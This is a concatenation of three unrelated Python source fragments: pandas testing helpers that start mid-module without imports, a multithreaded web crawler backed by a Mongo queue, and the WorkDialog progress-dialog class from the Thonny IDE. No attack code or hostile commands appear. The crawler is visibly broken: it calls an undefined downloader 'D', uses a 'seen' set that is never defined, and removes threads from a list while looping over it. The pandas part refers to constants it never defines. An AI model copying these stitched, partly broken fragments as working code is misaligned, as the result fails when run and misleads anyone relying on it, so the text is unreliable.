OBJECT_DTYPES: list[Dtype] = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA, Decimal("NaN")]
EMPTY_STRING_PATTERN = re.compile("^$")
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("always", category)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("ignore", category)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
if isinstance(expected, RangeIndex):
# pd.array would return an IntegerArray
expected = PandasArray(np.asarray(expected._values))
else:
expected = pd.array(expected)
elif box_cls is Index:
expected = Index(expected)
elif box_cls is Series:
expected = Series(expected)
elif box_cls is DataFrame:
expected = Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length. But convert to two rows to avoid
# single-row special cases in datetime arithmetic
expected = expected.T
expected = pd.concat([expected] * 2, ignore_index=True)
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
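# Usage sketch for box_expected (added; mirrors the docstring above):
#
#   >>> box_expected([1, 2, 3], Series)   # -> Series([1, 2, 3])
#   >>> box_expected([1, 2, 3], Index)    # -> Index([1, 2, 3])
#
# With box_cls=DataFrame and transpose=True the data is turned into a
# two-row frame so vectorised operations against same-length vectors still work.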
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Others
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k: int = 10, freq="B", name=None, **kwargs) -> DatetimeIndex:
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k: int = 10, freq="D", name=None, **kwargs) -> TimedeltaIndex:
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k: int = 10, name=None, **kwargs) -> PeriodIndex:
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
Returns a DataFrame with the following columns:
* name : object dtype with string names
* id : int dtype with Poisson(1000)-distributed integer values
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k: int = 10) -> Iterable[Index]:
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs: list[Callable[..., Index]] = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(np.random.randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(
np.random.randn(nper), index=makeDateIndex(nper, freq=freq), name=name
)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(np.random.randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame() -> DataFrame:
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multiindex with given dimensions, levels, names, etc.
nentries - number of entries in index
nlevels - number of levels (> 1 produces multiindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will be repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" creates a datetime index.
"td" creates a timedelta index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) == nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func_dict: dict[str, Callable[..., Index]] = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}
idx_func = idx_func_dict.get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
list_of_lists = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# note: typing.Counter is deprecated since Python 3.9; collections.Counter
# itself supports subscripting (see PEP 585 and Generic Alias Type)
cnt: Counter[str] = collections.Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
list_of_lists.append(result)
tuples = list(zip(*list_of_lists))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
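# Example of makeCustomIndex (added as illustration; labels follow the
# f"{prefix}_l{level}_g{group}" pattern built above), output roughly:
#
#   >>> makeCustomIndex(nentries=4, nlevels=2, prefix="#")
#   MultiIndex([('#_l0_g0', '#_l1_g0'),
#               ('#_l0_g1', '#_l1_g1'),
#               ('#_l0_g2', '#_l1_g2'),
#               ('#_l0_g3', '#_l1_g3')])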
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, r_idx_names - False/True/list of strings, yields no names,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" creates a datetime index.
"td" creates a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FIH","FOH","FUM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = round((1 - density) * nrows * ncols)
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
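# Usage sketch for test_parallel (added for illustration; as noted above the
# decorated function's return values are discarded):
#
#   >>> @test_parallel(num_threads=4)
#   ... def exercise_sum():
#   ...     Series(range(1000)).sum()
#   >>> exercise_sum()   # runs the body in 4 threads and joins them, returns None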
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: list[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
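# Example (added): on Linux/macOS os.linesep is "\n", so
#   >>> convert_rows_list_to_csv_str(["a,b", "1,2"])
#   'a,b\n1,2\n'
# while on Windows the separator is "\r\n".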
def external_error_raised(expected_exception: type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.common._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from com._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : str
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
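# Illustrative usage sketch (not part of the original helper): plain names map
# straight to the operator module, while "r"-prefixed names become reflected
# operators with swapped arguments.
def _example_get_op_from_name():
    assert get_op_from_name("add")(2, 3) == 5
    assert get_op_from_name("sub")(5, 3) == 2
    assert get_op_from_name("rsub")(5, 3) == -2  # evaluates 3 - 5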
# -----------------------------------------------------------------------------
# Indexing test helpers
def getitem(x):
return x
def setitem(x):
return x
def loc(x):
return x.loc
def iloc(x):
return x.iloc
def at(x):
return x.at
def iat(x):
return x.iat
|
threaded_crawler.py
|
import time
import threading
import urllib.parse
from downloader import Downloader
from mongo_queue import MongoQueue
SLEEP_TIME = 1
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36'
def threaded_crawler(seed_url, delay=5, cache=None, scrape_callback=None,
user_agent=USER_AGENT, proxies=None, num_retries=1,
max_threads=10, timeout=60):
"""Crawl this website in multiple threads
"""
# the queue of URLs that still need to be crawled
crawl_queue = MongoQueue()
crawl_queue.push(seed_url)
def process_queue():
while True:
            # keep track of the url currently being processed
try:
url = crawl_queue.pop()
except KeyError:
# currently no urls to process
break
else:
html = D(url)
if scrape_callback:
try:
links = scrape_callback(url, html) or []
except Exception as e:
print('Error in callback for: {}: {}'.format(url, e))
else:
for link in links:
link = normalize(seed_url, link)
# check whether already crawled this link
if link not in seen:
seen.add(link)
# add this new link to queue
                                crawl_queue.push(link)
crawl_queue.complete(url)
# wait for all download threads to finish
threads = []
while threads or crawl_queue:
# the crawl is still active
for thread in threads:
if not thread.is_alive():
# remove the stopped threads
threads.remove(thread)
while len(threads) < max_threads and crawl_queue:
# can start some more threads
thread = threading.Thread(target=process_queue)
# set daemon so main thread can exit when receives ctrl-c
            thread.daemon = True
thread.start()
threads.append(thread)
# all threads have been processed
# sleep temporarily so CPU can focus execution on other threads
time.sleep(SLEEP_TIME)
def normalize(seed_url, link):
"""Normalize this URL by removing hash and adding domain
"""
link, _ = urllib.parse.urldefrag(link) # remove hash to avoid duplicates
return urllib.parse.urljoin(seed_url, link)
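if __name__ == '__main__':
    # Illustrative invocation only (not part of the original script): the seed
    # URL is a placeholder, and a running MongoDB instance is assumed because
    # MongoQueue keeps the crawl frontier there.
    threaded_crawler('http://example.com/index', max_threads=4)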
|
workdlg.py
|
from logging import getLogger
import os
import queue
import signal
import subprocess
import threading
import time
import tkinter as tk
from tkinter import ttk, messagebox
from typing import Optional
from thonny import tktextext
from thonny.languages import tr
from thonny.misc_utils import running_on_windows
from thonny.ui_utils import CommonDialog, ems_to_pixels, create_action_label, set_text_if_different
logger = getLogger(__name__)
class WorkDialog(CommonDialog):
def __init__(self, master, autostart=False):
super(WorkDialog, self).__init__(master)
self._autostart = autostart
self._state = "idle"
self.success = False
self._work_events_queue = queue.Queue()
self.init_instructions_frame()
self.init_main_frame()
self.init_action_frame()
self.init_log_frame()
self.populate_main_frame()
self.rowconfigure(4, weight=1) # log frame
self.columnconfigure(0, weight=1)
self.title(self.get_title())
self.stdout = ""
self.stderr = ""
self._update_scheduler = None
self._keep_updating_ui()
self.bind("<Escape>", self.on_cancel, True)
self.protocol("WM_DELETE_WINDOW", self.on_cancel)
if self._autostart:
self.on_ok()
def populate_main_frame(self):
pass
def is_ready_for_work(self):
return True
def init_instructions_frame(self):
instructions = self.get_instructions()
self.instructions_frame = ttk.Frame(self, style="Tip.TFrame")
self.instructions_frame.grid(row=0, column=0, sticky="nsew")
self.instructions_frame.rowconfigure(0, weight=1)
self.instructions_frame.columnconfigure(0, weight=1)
pad = self.get_padding()
self.instructions_label = ttk.Label(self, style="Tip.TLabel", text=instructions)
self.instructions_label.grid(row=0, column=0, sticky="w", padx=pad, pady=pad)
def get_instructions(self) -> Optional[str]:
return None
def init_main_frame(self):
self.main_frame = ttk.Frame(self)
self.main_frame.grid(row=1, column=0, sticky="nsew")
def init_action_frame(self):
padding = self.get_padding()
intpad = self.get_internal_padding()
self.action_frame = ttk.Frame(self)
self.action_frame.grid(row=2, column=0, sticky="nsew")
self._progress_bar = ttk.Progressbar(
self.action_frame, length=ems_to_pixels(4), mode="indeterminate"
)
self._current_action_label = create_action_label(
self.action_frame,
text="",
width=round(self.get_action_text_max_length() * 1.1),
click_handler=self.toggle_log_frame,
)
self._current_action_label.grid(
row=1, column=2, sticky="we", pady=padding, padx=(0, intpad)
)
self._ok_button = ttk.Button(
self.action_frame,
text=self.get_ok_text(),
command=self.on_ok,
state="disabled",
default="active",
)
if not self._autostart:
self._ok_button.grid(column=4, row=1, pady=padding, padx=(0, intpad))
self._cancel_button = ttk.Button(
self.action_frame,
text=self.get_cancel_text(),
command=self.on_cancel,
)
self._cancel_button.grid(column=5, row=1, padx=(0, padding), pady=padding)
self.action_frame.columnconfigure(2, weight=1)
def get_action_text_max_length(self):
return 35
def init_log_frame(self):
self.log_frame = ttk.Frame(self)
self.log_frame.columnconfigure(1, weight=1)
self.log_frame.rowconfigure(1, weight=1)
fixed_font = tk.font.nametofont("TkFixedFont")
font = fixed_font.copy()
font.configure(size=round(fixed_font.cget("size") * 0.8))
self.log_text = tktextext.TextFrame(
self.log_frame,
horizontal_scrollbar=False,
wrap="word",
borderwidth=1,
height=5,
width=20,
font=font,
read_only=True,
)
padding = self.get_padding()
self.log_text.grid(row=1, column=1, sticky="nsew", padx=padding, pady=(0, padding))
def update_ui(self):
if self._state == "closed":
return
while not self._work_events_queue.empty():
self.handle_work_event(*self._work_events_queue.get())
if self._state == "closed":
return
if self._state == "idle":
if self.is_ready_for_work():
self._ok_button.configure(state="normal")
else:
self._ok_button.configure(state="disabled")
else:
self._ok_button.configure(state="disabled")
if self._state == "done":
set_text_if_different(self._cancel_button, tr("Close"))
else:
set_text_if_different(self._cancel_button, tr("Cancel"))
def start_work(self):
pass
def get_title(self):
return "Work dialog"
def _keep_updating_ui(self):
if self._state != "closed":
self.update_ui()
self._update_scheduler = self.after(200, self._keep_updating_ui)
else:
self._update_scheduler = None
def close(self):
self._state = "closed"
if self._update_scheduler is not None:
try:
self.after_cancel(self._update_scheduler)
except tk.TclError:
pass
self.destroy()
def cancel_work(self):
# worker should periodically check this value
self._state = "cancelling"
self.set_action_text(tr("Cancelling"))
def toggle_log_frame(self, event=None):
if self.log_frame.winfo_ismapped():
self.log_frame.grid_forget()
self.rowconfigure(2, weight=1)
self.rowconfigure(4, weight=0)
else:
self.log_frame.grid(row=4, column=0, sticky="nsew")
self.rowconfigure(2, weight=0)
self.rowconfigure(4, weight=1)
def get_ok_text(self):
return tr("OK")
def get_cancel_text(self):
return tr("Cancel")
def on_ok(self, event=None):
assert self._state == "idle"
if self.start_work() is not False:
self._state = "working"
self.success = False
self.grid_progress_widgets()
self._progress_bar["mode"] = "indeterminate"
self._progress_bar.start()
if not self._current_action_label["text"]:
self._current_action_label["text"] = tr("Starting") + "..."
def grid_progress_widgets(self):
padding = self.get_padding()
intpad = self.get_internal_padding()
self._progress_bar.grid(row=1, column=1, sticky="w", padx=(padding, intpad), pady=padding)
def on_cancel(self, event=None):
if self._state in ("idle", "done"):
self.close()
elif self._state == "cancelling" and self.confirm_leaving_while_cancelling():
self.close()
elif self.confirm_cancel():
self.cancel_work()
def confirm_leaving_while_cancelling(self):
return messagebox.askyesno(
"Close dialog?",
"Cancelling is in progress.\nDo you still want to close the dialog?",
parent=self,
)
def confirm_cancel(self):
return messagebox.askyesno(
"Cancel work?",
"Are you sure you want to cancel?",
parent=self,
)
def append_text(self, text: str, stream_name="stdout") -> None:
"""Appends text to the details box. May be called from another thread."""
self._work_events_queue.put(("append", (text, stream_name)))
setattr(self, stream_name, getattr(self, stream_name) + text)
def replace_last_line(self, text: str, stream_name="stdout") -> None:
"""Replaces last line in the details box. May be called from another thread."""
self._work_events_queue.put(("replace", (text, stream_name)))
setattr(self, stream_name, getattr(self, stream_name) + text)
def report_progress(self, value: float, maximum: float) -> None:
"""Updates progress bar. May be called from another thread."""
self._work_events_queue.put(("progress", (value, maximum)))
def set_action_text(self, text: str) -> None:
"""Updates text above the progress bar. May be called from another thread."""
self._work_events_queue.put(("action", (text,)))
def set_action_text_smart(self, text: str) -> None:
"""Updates text above the progress bar. May be called from another thread."""
text = text.strip()
if not text:
return
if len(text) > self.get_action_text_max_length():
text = text[: self.get_action_text_max_length() - 3] + "..."
self.set_action_text(text)
def report_done(self, success):
"""May be called from another thread."""
self._work_events_queue.put(("done", (success,)))
def handle_work_event(self, type, args):
if type in ("append", "replace"):
text, stream_name = args
if type == "replace":
self.log_text.text.direct_delete("end-1c linestart", "end-1c")
self.log_text.text.direct_insert("end", text, (stream_name,))
self.log_text.text.see("end")
elif type == "action":
set_text_if_different(self._current_action_label, args[0])
elif type == "progress":
value, maximum = args
if value is None or maximum is None:
if self._progress_bar["mode"] != "indeterminate":
self._progress_bar["mode"] = "indeterminate"
self._progress_bar.start()
else:
if self._progress_bar["mode"] != "determinate":
self._progress_bar["mode"] = "determinate"
self._progress_bar.stop()
self._progress_bar.configure(value=value, maximum=maximum)
elif type == "done":
self.on_done(args[0])
def on_done(self, success):
"""NB! Don't call from non-ui thread!"""
self.success = success
if self.success:
self._state = "done"
self._cancel_button.focus_set()
self._cancel_button["default"] = "active"
self._ok_button["default"] = "normal"
elif self._autostart:
# Can't try again if failed with autostart
self._state = "done"
self._cancel_button.focus_set()
self._cancel_button["default"] = "active"
self._ok_button["default"] = "normal"
else:
# allows trying again when failed
self._state = "idle"
self._ok_button.focus_set()
self._ok_button["default"] = "active"
self._cancel_button["default"] = "normal"
self._progress_bar.stop()
# need to put to determinate mode, otherwise it looks half done
self._progress_bar["mode"] = "determinate"
if self.success and self._autostart and not self.log_frame.winfo_ismapped():
self.close()
if not self.success and not self.log_frame.winfo_ismapped():
self.toggle_log_frame()
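# Illustrative subclass sketch (not part of Thonny): shows the intended usage of
# WorkDialog -- override start_work(), run the actual job on a background thread
# and report back only via the thread-safe helpers (append_text, report_progress,
# report_done). All names below are made up for the example.
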